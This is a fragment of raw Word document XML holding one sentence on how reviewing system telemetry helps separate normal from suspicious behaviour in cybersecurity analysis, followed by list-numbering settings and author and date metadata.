      <w:r w:rsidRPr="00544D6E">
        <w:t xml:space="preserve">Spending time reviewing system telemetry will improve the ability to distinguish </w:t>
      </w:r>
      <w:r w:rsidRPr="00544D6E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>normal</w:t>
      </w:r>
      <w:r w:rsidRPr="00544D6E">
        <w:t xml:space="preserve"> from </w:t>
      </w:r>
      <w:r w:rsidRPr="00544D6E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>suspicious</w:t>
      </w:r>
      <w:r w:rsidRPr="00544D6E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00544D6E">
        <w:t>behavior</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00544D6E">
        <w:t>, a critical skill in cybersecurity analysis.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="095FE10A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C336F"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="AED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72A7E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="9B1A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822A6"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="090E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574D8"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C24C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274012">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="2042167415">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="89088523">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="53368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E"/>
    <w:rsid w:val="002252D3"/>
    <w:rsid w:val="00544D6E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080D"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{DAEB9C59-ED62-46CC-BCB3-48024AFB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Odu</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Olatunde Odu</cp:lastModifiedBy>
  <cp:revision>1</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-02-15T13:33:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-02-15T13:41:00Z</dcterms:modified>
</cp:coreProperties>
</file>